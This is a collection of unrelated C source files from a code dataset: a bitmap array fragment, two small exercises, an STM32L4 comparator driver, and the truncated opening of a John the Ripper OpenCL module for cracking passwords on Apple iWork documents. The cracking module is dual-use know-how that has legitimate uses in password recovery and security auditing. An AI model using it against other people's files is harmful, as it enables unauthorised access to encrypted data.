0xFFFF0000,0x77775555,0xFF6A5555,0xFF6AFF6A,0xFFFF0000,0x77775555,0xAA7F5555,0xAA7FAA7F,
0x03FF0000,0x03770355,0xC36A0355,0xC36AC36A,0xFFC00000,0xAAAFAAFC,0x55ABAAAB,0x65AA65AA,
0x000F0000,0x03EA00FE,0x0FAA03AA,0x0EA90EA9,0x5AAC5AAC,0x5ABC5AAC,0xAAF0AAB0,0xFC00AFC0,
0xEAAAEAAA,0xFA95EAAA,0x3EAA3AAA,0x00FF0FEA,0xAA70AA70,0x5570AA70,0x55707770,0x0000FFF0,
0xAA6AAA6A,0x5555AA6A,0x55557777,0x0000FFFF,0xAA6AAA6A,0x5555AA6A,0x55557777,0x0000FFFF,
0xFF6AFF6A,0x5555FF6A,0x55557777,0x0000FFFF,0xAA7FAA7F,0x5555AA7F,0x55557777,0x0000FFFF,
0xC36AC36A,0xC355C36A,0x03550377,0x000003FF,0x65AA55AA,0x65AB65AA,0xAAAFAAAB,0xFFC0AAFC,
0x0EA90EAA,0x0FA90EA9,0x03EA03AA,0x000F00FE,0x5C00FC00,0x5C005C00,0x5C005C00,0x5C005C00,
0xD755FFFF,0x5FFFD7FF,0x7CFF7CD5,0xD7FF5F03,0x575CFFFC,0x73D77F5F,0x70F570F5,0x735F73D7,
0x75D5FFFF,0x75CD75FD,0x75CD75CD,0x75CD75CD,0xF5F5FFFF,0x75D575F5,0x755D75D5,0x757D755D,
0x7D55FFFF,0x3FCDF5FD,0x000D000D,0x35FD3FCD,0x5D55FFFF,0x5CD75FD7,0x5CD75CD7,0x5CD75CD7,
0x555FFFFF,0x70D77FD7,0x70D770D7,0x7FD770D7,0x7D5FFFFF,0x755D7D5D,0x575D755D,0x5F5D575D,
0x000D000F,0x000D000D,0x000D000D,0x000D000D,0xFC005C00,0x00000000,0x00000000,0x00000000,
0xFFFFD755,0x00000000,0x00000000,0x00000000,0xF3FC735C,0x00000000,0x00000000,0x00000000,
0xFFCF75CD,0x00000000,0x00000000,0x00000000,0xFFFFF57D,0x00000000,0x00000000,0x00000000,
0x0FFF3D55,0x00000000,0x00000000,0x00000000,0xFCFF5CD7,0x00000000,0x00000000,0x00000000,
0xFFFF555F,0x00000000,0x00000000,0x00000000,0xFFFF5F5F,0x00000000,0x00000000,0x00000000,
0x000F000D,0x00000000,0x00000000,0x00000000,0xAC000000,0xAAB0AAC0,0x5AAC5AB0,0x5AAC5AAC,
0x00EA0000,0x3AAA0EAA,0xEAAA3AAA,0xEAAAEAAA,0xFFF00000,0xDDF05570,0xAA705570,0xAA70AA70,
0xFFFF0000,0xDDDD5555,0xAA6A5555,0xAA6AAA6A,0xFFFF0000,0xDDDD5555,0xAA6A5555,0xAA6AAA6A,
0xFFFF0000,0xDDDD5555,0xAA6A5555,0xAA6AAA6A,0xFFFF0000,0xDDDD5555,0xFF6A5555,0xFF6AFF6A,
0x03FF0000,0x03DD0355,0xC37F0355,0xC37FC37F,0xAAC00000,0xAAABAAAC,0x65AA55AB,0x55AA65AA,
0x000E0000,0x03AA00EA,0x0EA903AA,0x0EAA0EA9,0x5AAC5AAC,0xAABC5A9C,0xA5F0AA70,0xFC005FC0,
0xEAAAEAAA,0xFAAADA95,0x3D6A36AA,0x00FF0FD5,0xAA70AA70,0x5570AA70,0x5570DDF0,0x0000FFF0,
0xAA6AAA6A,0x5555AA6A,0x5555DDDD,0x0000FFFF,0xAA6AAA6A,0x5555AA6A,0x5555DDDD,0x0000FFFF,
0xAA6AAA6A,0x5555AA6A,0x5555DDDD,0x0000FFFF,0xFF6AFF6A,0x5555FF6A,0x5555DDDD,0x0000FFFF,
0xC37FC37F,0xC355C37F,0x035503DD,0x000003FF,0x65AA65AA,0xAAAB65A9,0xAA5FAAA7,0xFFC055FC,
0x0EA90EA9,0x0FAA0DA9,0x03D6036A,0x000F00FD,0x5C00FC00,0x5C005C00,0x5C005C00,0x5C005C00,
0xD755FFFF,0x5FFFD7FF,0x7CFF7CD5,0xD7FF5F03,0x575CFFFC,0x73D77F5F,0x70F570F5,0x735F73D7,
0x75D5FFFF,0x75CD75FD,0x75CD75CD,0x75CD75CD,0xF5F5FFFF,0x75D575F5,0x755D75D5,0x757D755D,
0x7D55FFFF,0x3FCDF5FD,0x000D000D,0x35FD3FCD,0x5D55FFFF,0x5CD75FD7,0x5CD75CD7,0x5CD75CD7,
0x555FFFFF,0x70D77FD7,0x70D770D7,0x7FD770D7,0x7D5FFFFF,0x755D7D5D,0x575D755D,0x5F5D575D,
0x000D000F,0x000D000D,0x000D000D,0x000D000D,0xFC005C00,0x00000000,0x00000000,0x00000000,
0xFFFFD755,0x00000000,0x00000000,0x00000000,0xF3FC735C,0x00000000,0x00000000,0x00000000,
0xFFCF75CD,0x00000000,0x00000000,0x00000000,0xFFFFF57D,0x00000000,0x00000000,0x00000000,
0x0FFF3D55,0x00000000,0x00000000,0x00000000,0xFCFF5CD7,0x00000000,0x00000000,0x00000000,
0xFFFF555F,0x00000000,0x00000000,0x00000000,0xFFFF5F5F,0x00000000,0x00000000,0x00000000,
0x000F000D,0x00000000,0x00000000,0x00000000,0xFC000000,0xAAF0AFC0,0x5ABCAAB0,0x5AAC5AAC,
0x00FF0000,0x3EAA0FEA,0xFAAA3AAA,0xEAAAEAAA,0xFFF00000,0x77705570,0xAA705570,0xAA70AA70,
0xFFFF0000,0x77775555,0xAA6A5555,0xAA6AAA6A,0xFFFF0000,0x77775555,0xAA6A5555,0xAA6AAA6A,
0xFFFF0000,0x77775555,0xAA6A5555,0xAA6AAA6A,0xFFFF0000,0x77775555,0xFF6A5555,0xFF6AFF6A,
0x03FF0000,0x03770355,0xC37F0355,0xC37FC37F,0xFFC00000,0xAAAFAAFC,0x55ABAAAB,0x65AA65AA,
0x000F0000,0x03EA00FE,0x0FAA03AA,0x0EA90EA9,0x5AAC5AAC,0x5ABC5AAC,0xAAF0AAB0,0xFC00AFC0,
0xEAAAEAAA,0xFA95EAAA,0x3EAA3AAA,0x00FF0FEA,0xAA70AA70,0x5570AA70,0x55707770,0x0000FFF0,
0xAA6AAA6A,0x5555AA6A,0x55557777,0x0000FFFF,0xAA6AAA6A,0x5555AA6A,0x55557777,0x0000FFFF,
0xAA6AAA6A,0x5555AA6A,0x55557777,0x0000FFFF,0xFF6AFF6A,0x5555FF6A,0x55557777,0x0000FFFF,
0xC37FC37F,0xC355C37F,0x03550377,0x000003FF,0x65AA55AA,0x65AB65AA,0xAAAFAAAB,0xFFC0AAFC,
0x0EA90EAA,0x0FA90EA9,0x03EA03AA,0x000F00FE,
};
const unsigned short GalleryTitleLeftMap[400] __attribute__((aligned(4)))=
{
0x0000,0x0001,0x0002,0x0003,0x0004,0x0005,0x0006,0x0007,
0x0008,0x0009,0x000a,0x000b,0x000c,0x000d,0x000e,0x000f,
0x0010,0x0011,0x0012,0x0013,0x0014,0x0015,0x0016,0x0017,
0x0018,0x0019,0x001a,0x001b,0x001c,0x001d,0x001e,0x001f,
0x0020,0x0021,0x0022,0x0023,0x0024,0x0025,0x0026,0x0027,
0x0028,0x0029,0x002a,0x002b,0x002c,0x002d,0x002e,0x002f,
0x0030,0x0031,0x0032,0x0033,0x0034,0x0035,0x0036,0x0037,
0x0038,0x0039,0x003a,0x003b,0x003c,0x003d,0x003e,0x003f,
0x0040,0x0041,0x0042,0x0043,0x0044,0x0045,0x0046,0x0047,
0x0048,0x0049,0x004a,0x004b,0x004c,0x004d,0x004e,0x004f,
0x0050,0x0051,0x0052,0x0053,0x0054,0x0055,0x0056,0x0057,
0x0058,0x0059,0x005a,0x005b,0x005c,0x005d,0x005e,0x005f,
0x0060,0x0061,0x0062,0x0063,0x0064,0x0065,0x0066,0x0067,
0x0068,0x0069,0x006a,0x006b,0x006c,0x006d,0x006e,0x006f,
0x0070,0x0071,0x0072,0x0073,0x0074,0x0075,0x0076,0x0077,
0x0078,0x0079,0x007a,0x007b,0x007c,0x007d,0x007e,0x007f,
0x0080,0x0081,0x0082,0x0083,0x0084,0x0085,0x0086,0x0087,
0x0088,0x0089,0x008a,0x008b,0x008c,0x008d,0x008e,0x008f,
0x0090,0x0091,0x0092,0x0093,0x0094,0x0095,0x0096,0x0097,
0x0098,0x0099,0x009a,0x009b,0x009c,0x009d,0x009e,0x009f,
0x00a0,0x00a1,0x00a2,0x00a3,0x00a4,0x00a5,0x00a6,0x00a7,
0x00a8,0x00a9,0x00aa,0x00ab,0x00ac,0x00ad,0x00ae,0x00af,
0x00b0,0x00b1,0x00b2,0x00b3,0x00b4,0x00b5,0x00b6,0x00b7,
0x00b8,0x00b9,0x00ba,0x00bb,0x00bc,0x00bd,0x00be,0x00bf,
0x00c0,0x00c1,0x00c2,0x00c3,0x00c4,0x00c5,0x00c6,0x00c7,
0x00c8,0x00c9,0x00ca,0x00cb,0x00cc,0x00cd,0x00ce,0x00cf,
0x00d0,0x00d1,0x00d2,0x00d3,0x00d4,0x00d5,0x00d6,0x00d7,
0x00d8,0x00d9,0x00da,0x00db,0x00dc,0x00dd,0x00de,0x00df,
0x00e0,0x00e1,0x00e2,0x00e3,0x00e4,0x00e5,0x00e6,0x00e7,
0x00e8,0x00e9,0x00ea,0x00eb,0x00ec,0x00ed,0x00ee,0x00ef,
0x00f0,0x00f1,0x00f2,0x00f3,0x00f4,0x00f5,0x00f6,0x00f7,
0x00f8,0x00f9,0x00fa,0x00fb,0x00fc,0x00fd,0x00fe,0x00ff,
0x0100,0x0101,0x0102,0x0103,0x0104,0x0105,0x0106,0x0107,
0x0108,0x0109,0x010a,0x010b,0x010c,0x010d,0x010e,0x010f,
0x0110,0x0111,0x0112,0x0113,0x0114,0x0115,0x0116,0x0117,
0x0118,0x0119,0x011a,0x011b,0x011c,0x011d,0x011e,0x011f,
0x0120,0x0121,0x0122,0x0123,0x0124,0x0125,0x0126,0x0127,
0x0128,0x0129,0x012a,0x012b,0x012c,0x012d,0x012e,0x012f,
0x0130,0x0131,0x0132,0x0133,0x0134,0x0135,0x0136,0x0137,
0x0138,0x0139,0x013a,0x013b,0x013c,0x013d,0x013e,0x013f,
0x0140,0x0141,0x0142,0x0143,0x0144,0x0145,0x0146,0x0147,
0x0148,0x0149,0x014a,0x014b,0x014c,0x014d,0x014e,0x014f,
0x0150,0x0151,0x0152,0x0153,0x0154,0x0155,0x0156,0x0157,
0x0158,0x0159,0x015a,0x015b,0x015c,0x015d,0x015e,0x015f,
0x0160,0x0161,0x0162,0x0163,0x0164,0x0165,0x0166,0x0167,
0x0168,0x0169,0x016a,0x016b,0x016c,0x016d,0x016e,0x016f,
0x0170,0x0171,0x0172,0x0173,0x0174,0x0175,0x0176,0x0177,
0x0178,0x0179,0x017a,0x017b,0x017c,0x017d,0x017e,0x017f,
0x0180,0x0181,0x0182,0x0183,0x0184,0x0185,0x0186,0x0187,
0x0188,0x0189,0x018a,0x018b,0x018c,0x018d,0x018e,0x018f,
};
//}}BLOCK(GalleryTitleLeft) |
the_stack_data/753506.c | #include <stdio.h>
main()
{
int c,nl;
nl=0;
while((c=getchar())!=EOF)
if(c=='\n')
++nl;
printf("\t%d\n",nl);
}
|
the_stack_data/1244740.c | #include<stdio.h>
int main()
{
int n,i,sum=0;
printf("Enter any number:");
scanf("%d",&n);
for(i=1;i<=n/2;i++)
{
if(n%i==0){
sum+=i;
}
}
if(sum==n){
printf("\n %d is a perfect number",n);
}
else{
printf("\n %d is not a perfect number",n);
}
return 0;
}
|
the_stack_data/774240.c | /**
******************************************************************************
* @file stm32l4xx_ll_comp.c
* @author MCD Application Team
* @brief COMP LL module driver
******************************************************************************
* @attention
*
* <h2><center>© COPYRIGHT(c) 2017 STMicroelectronics</center></h2>
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* 3. Neither the name of STMicroelectronics nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
******************************************************************************
*/
#if defined(USE_FULL_LL_DRIVER)
/* Includes ------------------------------------------------------------------*/
#include "stm32l4xx_ll_comp.h"
#ifdef USE_FULL_ASSERT
#include "stm32_assert.h"
#else
#define assert_param(expr) ((void)0U)
#endif
/** @addtogroup STM32L4xx_LL_Driver
* @{
*/
#if defined (COMP1) || defined (COMP2)
/** @addtogroup COMP_LL COMP
* @{
*/
/* Private types -------------------------------------------------------------*/
/* Private variables ---------------------------------------------------------*/
/* Private constants ---------------------------------------------------------*/
/* Private macros ------------------------------------------------------------*/
/** @addtogroup COMP_LL_Private_Macros
* @{
*/
/* Check of parameters for configuration of COMP hierarchical scope: */
/* COMP instance. */
#define IS_LL_COMP_POWER_MODE(__POWER_MODE__) \
( ((__POWER_MODE__) == LL_COMP_POWERMODE_HIGHSPEED) \
|| ((__POWER_MODE__) == LL_COMP_POWERMODE_MEDIUMSPEED) \
|| ((__POWER_MODE__) == LL_COMP_POWERMODE_ULTRALOWPOWER) \
)
/* Note: On this STM32 serie, comparator input plus parameters are */
/* the same on all COMP instances. */
/* However, comparator instance kept as macro parameter for */
/* compatibility with other STM32 families. */
#if defined(COMP_CSR_INPSEL_1)
#define IS_LL_COMP_INPUT_PLUS(__COMP_INSTANCE__, __INPUT_PLUS__) \
( ((__INPUT_PLUS__) == LL_COMP_INPUT_PLUS_IO1) \
|| ((__INPUT_PLUS__) == LL_COMP_INPUT_PLUS_IO2) \
|| ((__INPUT_PLUS__) == LL_COMP_INPUT_PLUS_IO3) \
)
#else
#define IS_LL_COMP_INPUT_PLUS(__COMP_INSTANCE__, __INPUT_PLUS__) \
( ((__INPUT_PLUS__) == LL_COMP_INPUT_PLUS_IO1) \
|| ((__INPUT_PLUS__) == LL_COMP_INPUT_PLUS_IO2) \
)
#endif
/* Note: On this STM32 serie, comparator input minus parameters are */
/* the same on all COMP instances. */
/* However, comparator instance kept as macro parameter for */
/* compatibility with other STM32 families. */
#if defined(COMP_CSR_INMESEL_1)
#define IS_LL_COMP_INPUT_MINUS(__COMP_INSTANCE__, __INPUT_MINUS__) \
( ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_1_4VREFINT) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_1_2VREFINT) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_3_4VREFINT) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_VREFINT) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_DAC1_CH1) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_DAC1_CH2) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_IO1) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_IO2) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_IO3) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_IO4) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_IO5) \
)
#else
#define IS_LL_COMP_INPUT_MINUS(__COMP_INSTANCE__, __INPUT_MINUS__) \
( ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_1_4VREFINT) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_1_2VREFINT) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_3_4VREFINT) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_VREFINT) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_DAC1_CH1) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_DAC1_CH2) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_IO1) \
|| ((__INPUT_MINUS__) == LL_COMP_INPUT_MINUS_IO2) \
)
#endif
#define IS_LL_COMP_INPUT_HYSTERESIS(__INPUT_HYSTERESIS__) \
( ((__INPUT_HYSTERESIS__) == LL_COMP_HYSTERESIS_NONE) \
|| ((__INPUT_HYSTERESIS__) == LL_COMP_HYSTERESIS_LOW) \
|| ((__INPUT_HYSTERESIS__) == LL_COMP_HYSTERESIS_MEDIUM) \
|| ((__INPUT_HYSTERESIS__) == LL_COMP_HYSTERESIS_HIGH) \
)
#define IS_LL_COMP_OUTPUT_POLARITY(__POLARITY__) \
( ((__POLARITY__) == LL_COMP_OUTPUTPOL_NONINVERTED) \
|| ((__POLARITY__) == LL_COMP_OUTPUTPOL_INVERTED) \
)
#define IS_LL_COMP_OUTPUT_BLANKING_SOURCE(__OUTPUT_BLANKING_SOURCE__) \
( ((__OUTPUT_BLANKING_SOURCE__) == LL_COMP_BLANKINGSRC_NONE) \
|| ((__OUTPUT_BLANKING_SOURCE__) == LL_COMP_BLANKINGSRC_TIM1_OC5_COMP1) \
|| ((__OUTPUT_BLANKING_SOURCE__) == LL_COMP_BLANKINGSRC_TIM2_OC3_COMP1) \
|| ((__OUTPUT_BLANKING_SOURCE__) == LL_COMP_BLANKINGSRC_TIM3_OC3_COMP1) \
|| ((__OUTPUT_BLANKING_SOURCE__) == LL_COMP_BLANKINGSRC_TIM3_OC4_COMP2) \
|| ((__OUTPUT_BLANKING_SOURCE__) == LL_COMP_BLANKINGSRC_TIM8_OC5_COMP2) \
|| ((__OUTPUT_BLANKING_SOURCE__) == LL_COMP_BLANKINGSRC_TIM15_OC1_COMP2) \
)
/**
* @}
*/
/* Private function prototypes -----------------------------------------------*/
/* Exported functions --------------------------------------------------------*/
/** @addtogroup COMP_LL_Exported_Functions
* @{
*/
/** @addtogroup COMP_LL_EF_Init
* @{
*/
/**
* @brief De-initialize registers of the selected COMP instance
* to their default reset values.
* @note If comparator is locked, de-initialization by software is
* not possible.
* The only way to unlock the comparator is a device hardware reset.
* @param COMPx COMP instance
* @retval An ErrorStatus enumeration value:
* - SUCCESS: COMP registers are de-initialized
* - ERROR: COMP registers are not de-initialized
*/
ErrorStatus LL_COMP_DeInit(COMP_TypeDef *COMPx)
{
ErrorStatus status = SUCCESS;
/* Check the parameters */
assert_param(IS_COMP_ALL_INSTANCE(COMPx));
/* Note: Hardware constraint (refer to description of this function): */
/* COMP instance must not be locked. */
if(LL_COMP_IsLocked(COMPx) == 0U)
{
LL_COMP_WriteReg(COMPx, CSR, 0x00000000U);
}
else
{
/* Comparator instance is locked: de-initialization by software is */
/* not possible. */
/* The only way to unlock the comparator is a device hardware reset. */
status = ERROR;
}
return status;
}
/**
* @brief Initialize some features of COMP instance.
* @note This function configures features of the selected COMP instance.
* Some features are also available at scope COMP common instance
* (common to several COMP instances).
* Refer to functions having argument "COMPxy_COMMON" as parameter.
* @param COMPx COMP instance
* @param COMP_InitStruct Pointer to a @ref LL_COMP_InitTypeDef structure
* @retval An ErrorStatus enumeration value:
* - SUCCESS: COMP registers are initialized
* - ERROR: COMP registers are not initialized
*/
ErrorStatus LL_COMP_Init(COMP_TypeDef *COMPx, LL_COMP_InitTypeDef *COMP_InitStruct)
{
ErrorStatus status = SUCCESS;
/* Check the parameters */
assert_param(IS_COMP_ALL_INSTANCE(COMPx));
assert_param(IS_LL_COMP_POWER_MODE(COMP_InitStruct->PowerMode));
assert_param(IS_LL_COMP_INPUT_PLUS(COMPx, COMP_InitStruct->InputPlus));
assert_param(IS_LL_COMP_INPUT_MINUS(COMPx, COMP_InitStruct->InputMinus));
assert_param(IS_LL_COMP_INPUT_HYSTERESIS(COMP_InitStruct->InputHysteresis));
assert_param(IS_LL_COMP_OUTPUT_POLARITY(COMP_InitStruct->OutputPolarity));
assert_param(IS_LL_COMP_OUTPUT_BLANKING_SOURCE(COMP_InitStruct->OutputBlankingSource));
/* Note: Hardware constraint (refer to description of this function) */
/* COMP instance must not be locked. */
if(LL_COMP_IsLocked(COMPx) == 0U)
{
/* Configuration of comparator instance : */
/* - PowerMode */
/* - InputPlus */
/* - InputMinus */
/* - InputHysteresis */
/* - OutputPolarity */
/* - OutputBlankingSource */
#if defined(COMP_CSR_INMESEL_1)
MODIFY_REG(COMPx->CSR,
COMP_CSR_PWRMODE
| COMP_CSR_INPSEL
| COMP_CSR_SCALEN
| COMP_CSR_BRGEN
| COMP_CSR_INMESEL
| COMP_CSR_INMSEL
| COMP_CSR_HYST
| COMP_CSR_POLARITY
| COMP_CSR_BLANKING
,
COMP_InitStruct->PowerMode
| COMP_InitStruct->InputPlus
| COMP_InitStruct->InputMinus
| COMP_InitStruct->InputHysteresis
| COMP_InitStruct->OutputPolarity
| COMP_InitStruct->OutputBlankingSource
);
#else
MODIFY_REG(COMPx->CSR,
COMP_CSR_PWRMODE
| COMP_CSR_INPSEL
| COMP_CSR_SCALEN
| COMP_CSR_BRGEN
| COMP_CSR_INMSEL
| COMP_CSR_HYST
| COMP_CSR_POLARITY
| COMP_CSR_BLANKING
,
COMP_InitStruct->PowerMode
| COMP_InitStruct->InputPlus
| COMP_InitStruct->InputMinus
| COMP_InitStruct->InputHysteresis
| COMP_InitStruct->OutputPolarity
| COMP_InitStruct->OutputBlankingSource
);
#endif
}
else
{
/* Initialization error: COMP instance is locked. */
status = ERROR;
}
return status;
}
/**
* @brief Set each @ref LL_COMP_InitTypeDef field to default value.
* @param COMP_InitStruct Pointer to a @ref LL_COMP_InitTypeDef structure
* whose fields will be set to default values.
* @retval None
*/
void LL_COMP_StructInit(LL_COMP_InitTypeDef *COMP_InitStruct)
{
/* Set COMP_InitStruct fields to default values */
COMP_InitStruct->PowerMode = LL_COMP_POWERMODE_ULTRALOWPOWER;
COMP_InitStruct->InputPlus = LL_COMP_INPUT_PLUS_IO1;
COMP_InitStruct->InputMinus = LL_COMP_INPUT_MINUS_VREFINT;
COMP_InitStruct->InputHysteresis = LL_COMP_HYSTERESIS_NONE;
COMP_InitStruct->OutputPolarity = LL_COMP_OUTPUTPOL_NONINVERTED;
COMP_InitStruct->OutputBlankingSource = LL_COMP_BLANKINGSRC_NONE;
}
/**
* @}
*/
/**
* @}
*/
/**
* @}
*/
#endif /* COMP1 || COMP2 */
/**
* @}
*/
#endif /* USE_FULL_LL_DRIVER */
/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
|
the_stack_data/85485.c | /* JtR format to crack iWork '09, and '13 / '14 files.
*
* This software is Copyright (c) 2015, Dhiru Kholia <kholia at kth.se> and
* Maxime Hulliger <hulliger at kth.se>, and it is hereby released to the
* general public under the following terms:
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted.
*
* This code may be freely used and modified for any purpose.
*
* Big thanks to Sean Patrick O'Brien for making this format possible.
*/
#ifdef HAVE_OPENCL
#if FMT_EXTERNS_H
extern struct fmt_main fmt_opencl_iwork;
#elif FMT_REGISTERS_H
john_register_one(&fmt_opencl_iwork);
#else
#include <stdint.h>
#include <string.h>
#include "arch.h"
#include "formats.h"
#include "common.h"
#include "iwork_common.h"
#include "options.h"
#include "jumbo.h"
#include "common-opencl.h"
#include "misc.h"
#define OUTLEN 16
#define PLAINTEXT_LENGTH 28
#include "opencl_pbkdf2_hmac_sha1.h"
#define FORMAT_LABEL "iwork-opencl"
#define FORMAT_NAME "Apple iWork '09 / '13 / '14"
#define OCL_ALGORITHM_NAME "PBKDF2-SHA1 AES OpenCL"
#define ALGORITHM_NAME OCL_ALGORITHM_NAME
#define BENCHMARK_COMMENT ""
#define BENCHMARK_LENGTH -1001
#define MIN_KEYS_PER_CRYPT 1
#define MAX_KEYS_PER_CRYPT 1
#define BINARY_SIZE 0
#define BINARY_ALIGN MEM_ALIGN_WORD
#define SALT_SIZE sizeof(*cur_salt)
#define SALT_ALIGN MEM_ALIGN_WORD
static iwork_common_custom_salt *cur_salt;
/* This handles all widths */
#define GETPOS(i, index) (((index) % ocl_v_width) * 4 + ((i) & ~3U) * ocl_v_width + (((i) & 3) ^ 3) + ((index) / ocl_v_width) * 64 * ocl_v_width)
typedef struct {
unsigned int cracked;
} iwork_out;
typedef struct {
int salt_length;
int outlen;
int iterations;
unsigned char salt[SALTLEN];
unsigned char iv[IVLEN];
unsigned char blob[BLOBLEN];
} iwork_salt;
static unsigned int *inbuffer;
static iwork_out *output;
static iwork_salt currentsalt;
static cl_mem mem_in, mem_out, mem_salt, mem_state;
static size_t key_buf_size, outsize;
static int new_keys;
static struct fmt_main *self;
static cl_kernel pbkdf2_init, pbkdf2_loop, iwork_final;
/*
* HASH_LOOPS is ideally made by factors of (iteration count - 1) and should
* be chosen for a kernel duration of not more than 200 ms
*/
#define HASH_LOOPS (3 * 271)
#define ITERATIONS 100000 /* Just for auto tune */
#define LOOP_COUNT (((currentsalt.iterations - 1 + HASH_LOOPS - 1)) / HASH_LOOPS)
#define STEP 0
#define SEED 128
static const char * warn[] = {
"P xfer: " , ", init: " , ", loop: " , ", final: ", ", res xfer: "
};
static int split_events[] = { 2, -1, -1 };
//This file contains auto-tuning routine(s). Has to be included after formats definitions.
#include "opencl_autotune.h"
#include "memdbg.h"
/* ------- Helper functions ------- */
static size_t get_task_max_work_group_size()
{
size_t s;
s = autotune_get_task_max_work_group_size(FALSE, 0, pbkdf2_init);
s = MIN(s, autotune_get_task_max_work_group_size(FALSE, 0, pbkdf2_loop));
s = MIN(s, autotune_get_task_max_work_group_size(FALSE, 0, iwork_final));
return s;
}
static void create_clobj(size_t gws, struct fmt_main *self)
{
key_buf_size = 64 * gws;
outsize = sizeof(iwork_out) * gws;
// Allocate memory
inbuffer = mem_calloc(1, key_buf_size);
output = mem_alloc(outsize);
mem_in = clCreateBuffer(context[gpu_id], CL_MEM_READ_ONLY, key_buf_size, NULL, &ret_code);
HANDLE_CLERROR(ret_code, "Error allocating mem in");
mem_salt = clCreateBuffer(context[gpu_id], CL_MEM_READ_ONLY, sizeof(iwork_salt), NULL, &ret_code);
HANDLE_CLERROR(ret_code, "Error allocating mem setting");
mem_out = clCreateBuffer(context[gpu_id], CL_MEM_READ_WRITE, outsize, NULL, &ret_code);
HANDLE_CLERROR(ret_code, "Error allocating mem out");
mem_state = clCreateBuffer(context[gpu_id], CL_MEM_READ_WRITE, sizeof(pbkdf2_state) * gws, NULL, &ret_code);
HANDLE_CLERROR(ret_code, "Error allocating mem_state");
HANDLE_CLERROR(clSetKernelArg(pbkdf2_init, 0, sizeof(mem_in), &mem_in), "Error while setting mem_in kernel argument");
HANDLE_CLERROR(clSetKernelArg(pbkdf2_init, 1, sizeof(mem_salt), &mem_salt), "Error while setting mem_salt kernel argument");
HANDLE_CLERROR(clSetKernelArg(pbkdf2_init, 2, sizeof(mem_state), &mem_state), "Error while setting mem_state kernel argument");
HANDLE_CLERROR(clSetKernelArg(pbkdf2_loop, 0, sizeof(mem_state), &mem_state), "Error while setting mem_state kernel argument");
HANDLE_CLERROR(clSetKernelArg(iwork_final, 0, sizeof(mem_salt), &mem_salt), "Error while setting mem_salt kernel argument");
HANDLE_CLERROR(clSetKernelArg(iwork_final, 1, sizeof(mem_out), &mem_out), "Error while setting mem_out kernel argument");
HANDLE_CLERROR(clSetKernelArg(iwork_final, 2, sizeof(mem_state), &mem_state), "Error while setting mem_state kernel argument");
}
static void release_clobj(void)
{
if (output) {
HANDLE_CLERROR(clReleaseMemObject(mem_in), "Release mem in");
HANDLE_CLERROR(clReleaseMemObject(mem_salt), "Release mem setting");
HANDLE_CLERROR(clReleaseMemObject(mem_state), "Release mem state");
HANDLE_CLERROR(clReleaseMemObject(mem_out), "Release mem out");
MEM_FREE(inbuffer);
MEM_FREE(output);
}
}
static void done(void)
{
if (autotuned) {
release_clobj();
HANDLE_CLERROR(clReleaseKernel(pbkdf2_init), "Release kernel");
HANDLE_CLERROR(clReleaseKernel(pbkdf2_loop), "Release kernel");
HANDLE_CLERROR(clReleaseKernel(iwork_final), "Release kernel");
HANDLE_CLERROR(clReleaseProgram(program[gpu_id]), "Release Program");
autotuned--;
}
}
static void init(struct fmt_main *_self)
{
self = _self;
opencl_prepare_dev(gpu_id);
}
static void reset(struct db_main *db)
{
if (!autotuned) {
char build_opts[64];
snprintf(build_opts, sizeof(build_opts),
"-DHASH_LOOPS=%u -DOUTLEN=%u "
"-DPLAINTEXT_LENGTH=%u",
HASH_LOOPS, OUTLEN, PLAINTEXT_LENGTH);
opencl_init("$JOHN/kernels/iwork_kernel.cl", gpu_id, build_opts);
pbkdf2_init = clCreateKernel(program[gpu_id], "pbkdf2_init", &ret_code);
HANDLE_CLERROR(ret_code, "Error creating kernel");
crypt_kernel = pbkdf2_loop = clCreateKernel(program[gpu_id], "pbkdf2_loop", &ret_code);
HANDLE_CLERROR(ret_code, "Error creating kernel");
iwork_final = clCreateKernel(program[gpu_id], "iwork_final", &ret_code);
